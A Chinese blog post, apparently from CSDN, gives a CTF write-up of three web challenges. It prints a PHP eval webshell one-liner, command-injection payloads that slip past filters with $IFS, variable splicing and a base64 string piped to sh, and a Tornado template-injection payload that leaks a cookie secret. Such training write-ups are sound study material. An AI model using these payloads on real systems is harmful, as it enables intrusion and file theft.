CTF第三天

最新推荐文章于 2023-02-18 22:05:20 发布
最新推荐文章于 2023-02-18 22:05:20 发布
阅读量487 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52680097/article/details/117278473
版权
本文讲述了在极客大挑战2019的Knife1任务中,通过变量拼接和特殊字符利用技巧绕过字符串过滤,成功连接蚁剑并找到flag。在护网杯2018的easy_tornado1中,通过模板注入和cookie_secret的破解,最终获取flag文件。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]Knife 1

进去以后,看到这个页面,猜想要用蚁剑
在这里插入图片描述

//eval — 把字符串bai作为PHP代码执行 
eval('echo 123;');//输出123

eval($_POST["Syc"]);//上传一个字符串Sys

打开蚁剑,添加URL,密码为Sys
在这里插入图片描述
连接后在根目录找到flag
在这里插入图片描述
[GXYCT

[GXYCTF2019]Ping Ping Ping 1

进去后看到这个一个查询ip的格式,我们可以用这个来输入命令
在这里插入图片描述
首先输入/?ip=127.0.0.1|ls,发现了两个目录
在这里插入图片描述
试试/?ip=127.0.0.1|cat flag.php,空格被ban了
在这里插入图片描述
用$IFS 9 来 代 替 空 格 , 数 字 可 以 用 1 − 9 ( 如 9来代替空格,数字可以用1-9(如 919IFS$1也一样可以绕过)

/?ip=127.0.0.1|cat$IFS$9flag.php

但是flag也被ban了,去index.php看看
在这里插入图片描述
在这里插入图片描述
我们发现基本上全被ban了
通过变量实现字符串拼接
解题思路
1.通过变量实现字符串拼接
构造/?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php
注:此处将变量ab的位置互换是为了绕过字符串匹配

2.通过执行sh命令来执行 (bash被过滤了,不然也可以执行)
构造/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
注:sh是linux中运行shell的命令,bash相当于sh的升级版,sh∈bash

在这里插入图片描述

[护网杯 2018]easy_tornado 1

进去flag.txt看看,发现要读取/fllllllllllllag,并且要相关的hash
在这里插入图片描述
看看这个路径
在这里插入图片描述
看看有没有模板注入,输入/error?msg={{9*3}}返回ORZ,不太行
输入/error?msg={{1}}返回1

去hints.txt看看,发现了hash加密的方式以及cookie_secret
在这里插入图片描述
再去welcome.txt看看,发现了render函数。render()函数是渲染函数,进行服务器端渲染。
在这里插入图片描述
Tornado框架的附属文件handler.settings中存在cookie_secret
于是构造/error?msg={{handler.settings}},返回了cookie_secret
在这里插入图片描述
cookie_secret为f28e1f96-265d-4692-80cf-587658c6dae6
filename就是/fllllllllllllag,md5解密后为3bf9f6cf685a6dd8defadabfb41a03a1
在这里插入图片描述
cookie_secret和filename连接后再进行md5加密
f28e1f96-265d-4692-80cf-587658c6dae63bf9f6cf685a6dd8defadabfb41a03a1
在这里插入图片描述

payload/file?filename=/fllllllllllllag&filehash=8fc07d4838f25f3ba330fce042f0d3df在这里插入图片描述

、Ange射手
关注
专栏目录
CTF打卡第三天
weixin_60499871的博客
07-07 115
第一题:backup打开网址如图:常见的备份文件后缀名有: 然后用记事本打开如图 :第二题:cookie 打开网址如图:这里加一些cookie知识: Cookie是当主机访问Web服务器时,由 Web 服务器创建的,将信息存储在用户计算机上的文件。一般网络用户习惯用其复数形式 Cookies,指某些网站为了辨别用户身份、进行 Session 跟踪而存储在用户本地终端上的数据,而这些数据通常会经过加密处理。然后 Fn+F12,在console上输入document.cookie如图然后在URL后加上/cook
CTF打卡第二天
weixin_60499871的博客
07-05 181
第八题:掀桌子看起来一串十六进制,马上想到转换成字符,但是不行。将两个一组,减去128,输出acsii码 ,Python脚本如图 得到如图:转战web区:第一题:view_source 点击获取在线场景,有一个网址,因为题目是要查看网页源代码,但是右键用不了,所以目的是想办法看源代码,百度查了:Ctrl+U,里面有flag 第二题:get_post打开网址,如网站上显示操作进行如图,进行get请求再利用hackbar进行post请求 得到flag如图 第三题:robots由题目提醒robots协议,立刻想到
记录遇到的有趣的CTF题---simple_api(xxe漏洞)
tothemoon的博客
11-05 2106
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
每天一道ctf
whisper921的博客
10-28 1076
有这样一行代码
[GXYCTF2019]Ping Ping Ping
最新发布
m0sway的博客
02-18 79
BUU CTF Web题目 [GXYCTF2019]Ping Ping Ping的WriteUp
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-28 219
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
2021CTF工业信息安全大赛第三场题.rar
07-05
【2021CTF工业信息安全大赛第三场题.rar】是一个与工业信息安全竞赛相关的压缩文件,其包含了多个有助于参赛者准备比赛的学习资料。这个压缩包包含的文件分别为:《电气原理.docx》、《接线文档.docx》、《实物...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
3. **反序列化漏洞**: Java的反序列化机制允许对象的状态从字节流恢复到对象实例。然而,如果序列化和反序列化过程没有正确地进行安全控制,攻击者可能注入恶意对象,触发任意代码执行。常见的利用方式包括构造特殊...
2021CTF工业信息安全大赛第一场题.rar
09-19
【标题】"2021CTF工业信息安全大赛第一场题.rar" 提供的信息表明,这是一个与2021年工业信息安全领域的CTF(Capture The Flag)比赛相关的压缩包文件,其包含了第一场比赛的试题。CTF比赛通常涉及网络安全、密码学...
命令执行漏洞之CTF
qq_46085232的博客
07-09 489
命令执行漏洞之CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行的题。(题目简单,就不贴图了) 1.通过标题,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 535
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
CTFping命令绕过及符号用法
热门推荐
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1179
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTF--攻防世界Web新手训练7-12
qq_40730029的博客
04-28 2030
7.simple_php 8.get_post 9.xff_referer 11.command_execution 12.simple_js 7.simple_php 题目:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 进入场景之后看到php代码,我们只需通过get方式将满足条件的a,b值输入在地址栏即可拿到flag flag如下: Cyberpeace{647E37...
BUUCTF-[GXYCTF2019]Ping Ping Ping
qq_62875941的博客
12-28 420
打开链接 /?ip=(GET传参方式) 这题跟[ACTF2020 新生赛]Exec1差不多 那我们先看看有啥文件 /?ip=;ls或者/?ip=127.0.0.1;ls (ip地址写啥都行,其127.0.0.1ping的是本机的地址) 发现里面有flag.php文件 但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久 下面来总结一下常见的绕过方法 1.空格 (1)%20 (2)%09 (3)<> (4)$..
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2603
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
备战CTF做题题解
weixin_40707492的博客
07-21 6574
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 498
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么
国科大Web安全期末CTF挑战解析
最后,第三题涉及到了URL编码和可能的SQL注入。URL编码用于在URL传输非ASCII字符,这里的"id=MQ%3d%3d"经过解码后是"MQ==",进一步解码得到数字"1"。接着,通过构造不同的"orderby"参数,我们能够探查到数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值